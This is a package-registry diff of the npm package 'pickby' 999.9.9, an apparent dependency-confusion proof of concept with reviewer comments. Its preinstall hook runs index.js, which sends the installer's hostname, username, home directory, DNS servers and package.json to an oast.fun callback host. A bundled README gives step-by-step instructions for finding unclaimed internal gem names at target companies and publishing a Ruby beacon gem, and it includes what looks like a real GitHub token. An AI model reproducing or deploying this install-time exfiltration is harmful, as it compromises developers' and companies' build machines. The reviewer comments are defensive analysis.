pickby 999.9.9
Potentially problematic release.
This version of pickby might be problematic.
- package/gem/ruby_dependency_confusion_attacks/CHANGELOG.md +5 -0
- package/gem/ruby_dependency_confusion_attacks/Gemfile +8 -0
- package/gem/ruby_dependency_confusion_attacks/README.md +128 -0
- package/gem/ruby_dependency_confusion_attacks/Rakefile +4 -0
- package/gem/ruby_dependency_confusion_attacks/bin/console +11 -0
- package/gem/ruby_dependency_confusion_attacks/bin/setup +8 -0
- package/gem/ruby_dependency_confusion_attacks/chef-cli-9.9.9.gem +0 -0
- package/gem/ruby_dependency_confusion_attacks/lib/mygem/version.rb +5 -0
- package/gem/ruby_dependency_confusion_attacks/lib/mygem.rb +0 -0
- package/gem/ruby_dependency_confusion_attacks/lib/mygem.rb.bak +28 -0
- package/gem/ruby_dependency_confusion_attacks/mygem.gemspec +12 -0
- package/gem/ruby_dependency_confusion_attacks/mygem.gemspec.bak +12 -0
- package/gem/ruby_dependency_confusion_attacks/sig/mygem.rbs +4 -0
- package/index.js +46 -0
- package/index.js.bak +46 -0
- package/package.json +14 -0
- package/package.json.bak +14 -0
@@ -0,0 +1,128 @@
|
|
1
|
+
<h1 align="center">
|
2
|
+
<a href="https://www.youtube.com/@techghoshal"><img src="https://github.com/techghoshal/ruby_dependency_confusion_attacks/assets/85815644/0b65137c-72e8-4003-b4b1-265cd25a37bd"></a>
|
3
|
+
<h1 align="center">Ruby Dependency Confusion Attacks POC
|
4
|
+
<p align="center"><img alt="Twitter Follow" src="https://img.shields.io/twitter/follow/techghoshal?style=social"></p>
|
5
|
+
</h1>
|
6
|
+
|
7
|
+
|
8
|
+
## How to Finds & How to Exploit
|
9
|
+
|
10
|
+
Finds Gemfile then check the all require here is public or not
|
11
|
+
|
12
|
+
`https://rubygems.org/gems/`
|
13
|
+
|
14
|
+
#### Download all target github repository
|
15
|
+
|
16
|
+
- Crate personal access tokens (classic) - https://github.com/settings/tokens
|
17
|
+
- Install ghorg - https://github.com/gabrie30/ghorg#installation
|
18
|
+
|
19
|
+
```bash
|
20
|
+
$ ghorg clone <target> -t <token>
|
21
|
+
```
|
22
|
+
`example: $ ghorg clone microsoft -t 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`
|
23
|
+
|
24
|
+
- After Download all repository finds vulnerable ruby package
|
25
|
+
|
26
|
+
```bash
|
27
|
+
$ find . -type f -name Gemfile | xargs -n1 -I{} cat {} | awk '/gem / {print}' | awk '{print $2;}' | tr -d '"' | tr -d ",'" | sort -u | xargs -n1 -I{} echo "https://rubygems.org/gems/{}" | httpx -status-code -silent -content-length -mc 404
|
28
|
+
```
|
29
|
+
- 404 code means this package not available publicly, so this the vulnerable to dependencies confusion attack.
|
30
|
+
|
31
|
+
- Then must be cross checking using github dorking - `org:microsoft package_name`
|
32
|
+
|
33
|
+
- So now Publish this ruby packages publicly (https://rubygems.org)
|
34
|
+
|
35
|
+
```bash
|
36
|
+
$ bundle gem <package_name>
|
37
|
+
```
|
38
|
+
- Everything set default
|
39
|
+
|
40
|
+
```bash
|
41
|
+
$ cd <package_name>
|
42
|
+
```
|
43
|
+
```bash
|
44
|
+
$ nano <package_name>.gem
|
45
|
+
```
|
46
|
+
- Replaced -
|
47
|
+
|
48
|
+
```bash
|
49
|
+
Gem::Specification.new do |s|
|
50
|
+
s.name = "<package_name>"
|
51
|
+
s.version = "9.9.9"
|
52
|
+
s.summary = "Vulnerability Disclosure: Dependency confiuse vulnerability"
|
53
|
+
s.description = "This Ruby package vulnerable to dependency confiuse vulnerability"
|
54
|
+
s.authors = ["<Anindya Ghoshal>"]
|
55
|
+
s.email = "<techghoshal@gmail.com>"
|
56
|
+
s.files = ["lib/<package_name>.rb"]
|
57
|
+
s.homepage =
|
58
|
+
"https://rubygems.org/gems/<package_name>"
|
59
|
+
s.license = "MIT"
|
60
|
+
end
|
61
|
+
```
|
62
|
+
- Save this file
|
63
|
+
|
64
|
+
```bash
|
65
|
+
$ cd lib
|
66
|
+
```
|
67
|
+
- Replaced -
|
68
|
+
|
69
|
+
```bash
|
70
|
+
module <myGem>
|
71
|
+
|
72
|
+
require 'json'
|
73
|
+
require 'net/http'
|
74
|
+
require 'socket'
|
75
|
+
|
76
|
+
#Private IP
|
77
|
+
privip = UDPSocket.open {|s| s.connect("64.233.187.99", 1); s.addr.last}
|
78
|
+
#Hostname
|
79
|
+
hostname = Socket.gethostname
|
80
|
+
#Current directory
|
81
|
+
dir = Dir.pwd
|
82
|
+
|
83
|
+
#Pubcli bin url:- https://pipedream.com OR burpCollaborate url
|
84
|
+
uri = URI('https://<pipedream.net>')
|
85
|
+
req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')
|
86
|
+
|
87
|
+
req.body = {
|
88
|
+
private_ip: privip,
|
89
|
+
hostname: hostname,
|
90
|
+
current_directory: dir
|
91
|
+
}.to_json
|
92
|
+
|
93
|
+
Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme == 'https') do |http|
|
94
|
+
http.request(req)
|
95
|
+
end
|
96
|
+
|
97
|
+
end
|
98
|
+
|
99
|
+
```
|
100
|
+
- Save this file
|
101
|
+
|
102
|
+
```bash
|
103
|
+
$ cd ..
|
104
|
+
```
|
105
|
+
```bash
|
106
|
+
$ gem build <package_name>.gemspec
|
107
|
+
```
|
108
|
+
- Upload file publicly (https://rubygems.org/)
|
109
|
+
|
110
|
+
- Create Accont on rubygems.org
|
111
|
+
|
112
|
+
```bash
|
113
|
+
$ gem push <package_name>-9.9.9.gem
|
114
|
+
```
|
115
|
+
- Enter your Email: `<email>`
|
116
|
+
- Enter your username: `<username>`
|
117
|
+
- Enter your password: `<password>`
|
118
|
+
|
119
|
+
---
|
120
|
+
|
121
|
+
<b>Upload IS DONE</b> 😎
|
122
|
+
- Must be checking - https://rubygems.org/gems/package_name
|
123
|
+
- 🎉 Now Bounty Time 💰💰
|
124
|
+
|
125
|
+
## Connect me
|
126
|
+
If you have any queries, you can always contact me on <a href="https://twitter.com/techghoshal">twitter(@techghoshal)</a>
|
127
|
+
|
128
|
+
|
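Review bot: the `find ... | httpx -status-code -silent -content-length -mc 404` pipeline overstates what it finds: the awk filter takes the second token of every `gem` line, so names declared with `path:` or `git:` options or inside a private `source` block are listed too, and a 404 on rubygems.org only matters where Bundler is allowed to fall back to the public index for that name (the GitHub dorking cross-check partly covers this). Two smaller points in the same hunk: the `ghorg clone microsoft -t ...` example embeds a literal `ghp_` classic token where `<token>` should be, and a real token in a README is a leaked credential; and `$ nano <package_name>.gem` should read `<package_name>.gemspec`, since what is being replaced is the `Gem::Specification` and the later step runs `gem build <package_name>.gemspec`. For the organisation being checked, the same sweep is a self-audit: every internal name it reports as 404 should be pinned to a private `source` block or reserved under the organisation's own account so that a higher-versioned public gem can never be selected.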
@@ -0,0 +1,11 @@
|
|
1
|
+
#!/usr/bin/env ruby
|
2
|
+
# frozen_string_literal: true
|
3
|
+
|
4
|
+
require "bundler/setup"
|
5
|
+
require "mygem"
|
6
|
+
|
7
|
+
# You can add fixtures and/or initialization code here to make experimenting
|
8
|
+
# with your gem easier. You can also use a different console, if you like.
|
9
|
+
|
10
|
+
require "irb"
|
11
|
+
IRB.start(__FILE__)
|
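Review bot: unmodified `bundle gem` scaffolding. `require "mygem"` would load lib/mygem.rb, which the file listing shows as +0 -0 (empty), so in this snapshot the console would not execute the beacon that lives in lib/mygem.rb.bak.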
Binary file
|
File without changes
|
@@ -0,0 +1,28 @@
|
|
1
|
+
module <myGem>
|
2
|
+
|
3
|
+
require 'json'
|
4
|
+
require 'net/http'
|
5
|
+
require 'socket'
|
6
|
+
|
7
|
+
#Private IP
|
8
|
+
privip = UDPSocket.open {|s| s.connect("64.233.187.99", 1); s.addr.last}
|
9
|
+
#Hostname
|
10
|
+
hostname = Socket.gethostname
|
11
|
+
#Current directory
|
12
|
+
dir = Dir.pwd
|
13
|
+
|
14
|
+
#Pubcli bin url:- https://pipedream.com OR burpCollaborate url
|
15
|
+
uri = URI('ck385ge2vtc00008gwb0gj1ta3wyyyyyf.oast.fun>')
|
16
|
+
req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')
|
17
|
+
|
18
|
+
req.body = {
|
19
|
+
private_ip: privip,
|
20
|
+
hostname: hostname,
|
21
|
+
current_directory: dir
|
22
|
+
}.to_json
|
23
|
+
|
24
|
+
Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme == 'https') do |http|
|
25
|
+
http.request(req)
|
26
|
+
end
|
27
|
+
|
28
|
+
end
|
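Review bot: this file would not load as written: `module <myGem>` is not valid Ruby (angle brackets in a constant name), and `URI('ck385...oast.fun>')` has no scheme and a trailing `>`, so `uri.hostname` and `uri.port` are nil and `Net::HTTP.start` would raise. The intended behaviour is still the useful part for detection: a UDP `connect` to 64.233.187.99 to learn the host's private address, then a JSON POST of private_ip, hostname and cwd to an `oast.fun` (Interactsh) callback, executed at `require` time because the code sits in the module body rather than in a method. Note also that the listing shows lib/mygem.rb as +0 -0 and the gemspec packages only that file, so this .bak is the template rather than what shipped. Defensively, egress from build agents to `*.oast.fun`, `burpcollaborator.net`, pipedream and similar callback domains is a high-signal alert, and a gem whose library file opens sockets at load time should fail review.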
@@ -0,0 +1,12 @@
|
|
1
|
+
Gem::Specification.new do |s|
|
2
|
+
s.name = "chef-cli"
|
3
|
+
s.version = "9.9.9"
|
4
|
+
s.summary = "Vulnerability Disclosure: Dependency confiuse vulnerability"
|
5
|
+
s.description = "This Ruby package vulnerable to dependency confiuse vulnerability"
|
6
|
+
s.authors = ["Anindya Ghoshal"]
|
7
|
+
s.email = "rootkaliroot@gmail.com"
|
8
|
+
s.files = ["lib/mygem.rb"]
|
9
|
+
s.homepage =
|
10
|
+
"https://rubygems.org/gems/mygem"
|
11
|
+
s.license = "MIT"
|
12
|
+
end
|
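Review bot: the metadata is internally inconsistent: `s.name = "chef-cli"` but `s.files = ["lib/mygem.rb"]` and `s.homepage` points at rubygems.org/gems/mygem, so `require "chef-cli"` would find no file and the gem is pure name/version bait (version 9.9.9 with a summary announcing a vulnerability disclosure). That combination, a name lifted from a target Gemfile, an implausibly high version, files that do not match the name, and a contact address differing from the README's `techghoshal@gmail.com`, is what a registry-side or Bundler-side policy check should reject, and it is the signature to look for when triaging a sudden new upstream version of a gem you also host privately.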
@@ -0,0 +1,12 @@
|
|
1
|
+
Gem::Specification.new do |s|
|
2
|
+
s.name = "mixlib-versioning"
|
3
|
+
s.version = "9.9.9"
|
4
|
+
s.summary = "Vulnerability Disclosure: Dependency confiuse vulnerability"
|
5
|
+
s.description = "This Ruby package vulnerable to dependency confiuse vulnerability"
|
6
|
+
s.authors = ["Anindya Ghoshal"]
|
7
|
+
s.email = "rootkaliroot@gmail.com"
|
8
|
+
s.files = ["lib/mygem.rb"]
|
9
|
+
s.homepage =
|
10
|
+
"https://rubygems.org/gems/mygem"
|
11
|
+
s.license = "MIT"
|
12
|
+
end
|
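Review bot: identical to mygem.gemspec except `s.name = "mixlib-versioning"`, which shows the spec is a template with the name swapped per target; `s.files` and `s.homepage` were not updated either time. The practical takeaway for defenders is that the publishing identity, summary text and 9.9.9 version are constant across targets, so a registry monitor keyed on those fields catches every instance, not just one name.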
package/index.js
ADDED
@@ -0,0 +1,46 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
const trackingData = JSON.stringify({
|
9
|
+
p: package,
|
10
|
+
c: __dirname,
|
11
|
+
hd: os.homedir(),
|
12
|
+
hn: os.hostname(),
|
13
|
+
un: os.userInfo().username,
|
14
|
+
dns: dns.getServers(),
|
15
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
16
|
+
v: packageJSON.version,
|
17
|
+
pjson: packageJSON,
|
18
|
+
});
|
19
|
+
|
20
|
+
var postData = querystring.stringify({
|
21
|
+
msg: trackingData,
|
22
|
+
});
|
23
|
+
|
24
|
+
var options = {
|
25
|
+
hostname: "ck385ge2vtc00008gwb0gjupp4yyyyyyg.oast.fun", //replace burpcollaborator.net with Interactsh or pipedream
|
26
|
+
port: 443,
|
27
|
+
path: "/",
|
28
|
+
method: "POST",
|
29
|
+
headers: {
|
30
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
31
|
+
"Content-Length": postData.length,
|
32
|
+
},
|
33
|
+
};
|
34
|
+
|
35
|
+
var req = https.request(options, (res) => {
|
36
|
+
res.on("data", (d) => {
|
37
|
+
process.stdout.write(d);
|
38
|
+
});
|
39
|
+
});
|
40
|
+
|
41
|
+
req.on("error", (e) => {
|
42
|
+
// console.error(e);
|
43
|
+
});
|
44
|
+
|
45
|
+
req.write(postData);
|
46
|
+
req.end();
|
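Review bot: `packageJSON.___resolved` (three underscores) is not a field npm ever writes; older npm versions stamped `_resolved` (one underscore) into an installed package.json, so `r` is always undefined here, although `pjson: packageJSON` ships the whole file anyway. The `req.on("error", ...)` handler with its body commented out silently discards failures, which keeps the beacon quiet when egress is blocked, and the `//replace burpcollaborator.net ...` comment is stale because the value is already an Interactsh `oast.fun` host. What the POST carries is the full inventory: package name, install directory, home directory, hostname, username, the DNS resolver list and the complete package.json. Since this runs from the `preinstall` hook declared in package.json, `npm ci --ignore-scripts` (or `ignore-scripts=true` in the CI .npmrc) plus an egress allowlist stops it, and `dns.getServers()` together with `os.userInfo()` inside an install script that has no other purpose is a reliable scanner heuristic.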
package/index.js.bak
ADDED
@@ -0,0 +1,46 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
const trackingData = JSON.stringify({
|
9
|
+
p: package,
|
10
|
+
c: __dirname,
|
11
|
+
hd: os.homedir(),
|
12
|
+
hn: os.hostname(),
|
13
|
+
un: os.userInfo().username,
|
14
|
+
dns: dns.getServers(),
|
15
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
16
|
+
v: packageJSON.version,
|
17
|
+
pjson: packageJSON,
|
18
|
+
});
|
19
|
+
|
20
|
+
var postData = querystring.stringify({
|
21
|
+
msg: trackingData,
|
22
|
+
});
|
23
|
+
|
24
|
+
var options = {
|
25
|
+
hostname: "ck385ge2vtc00008gwb0gj1ta3wyyyyyf.oast.fun", //replace burpcollaborator.net with Interactsh or pipedream
|
26
|
+
port: 443,
|
27
|
+
path: "/",
|
28
|
+
method: "POST",
|
29
|
+
headers: {
|
30
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
31
|
+
"Content-Length": postData.length,
|
32
|
+
},
|
33
|
+
};
|
34
|
+
|
35
|
+
var req = https.request(options, (res) => {
|
36
|
+
res.on("data", (d) => {
|
37
|
+
process.stdout.write(d);
|
38
|
+
});
|
39
|
+
});
|
40
|
+
|
41
|
+
req.on("error", (e) => {
|
42
|
+
// console.error(e);
|
43
|
+
});
|
44
|
+
|
45
|
+
req.write(postData);
|
46
|
+
req.end();
|
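Review bot: line for line the same beacon as index.js apart from the callback host, `ck385ge2vtc00008gwb0gj1ta3wyyyyyf.oast.fun` here versus `ck385ge2vtc00008gwb0gjupp4yyyyyyg.oast.fun` in index.js, and this one is also the host used in lib/mygem.rb.bak. Both share the same Interactsh session prefix, so an indicator list for this package should carry both names, or for build hosts simply the `oast.fun` suffix.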
package/package.json
ADDED
@@ -0,0 +1,14 @@
|
|
1
|
+
{
|
2
|
+
"name": "pickby",
|
3
|
+
"version": "999.9.9",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": " node index.js"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
}
|
14
|
+
}
|
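Review bot: `"preinstall": " node index.js"` runs the beacon before any dependency is installed or reviewed (the leading space is harmless but marks a hand-edited template). Together with `"version": "999.9.9"`, an empty description and author and an empty dependencies map, this is the dependency-confusion shape: the only content is a high version number and an install hook. On the consuming side, set `ignore-scripts=true` in the CI .npmrc, map internal scopes to the private registry with `@scope:registry=` rather than relying on unscoped names, and alert on any new public publication of a name that already exists in the private registry.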
package/package.json.bak
ADDED
@@ -0,0 +1,14 @@
|
|
1
|
+
{
|
2
|
+
"name": "pickby",
|
3
|
+
"version": "9.9.9.9",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": " node index.js"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
}
|
14
|
+
}
|
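Review bot: `"version": "9.9.9.9"` is not valid semver (four numeric components), so `npm publish` rejects it; that is the likely reason the shipped package.json carries `999.9.9` instead. The .bak already has the same `preinstall` hook, so the install-time execution was part of the design from the first draft rather than added later.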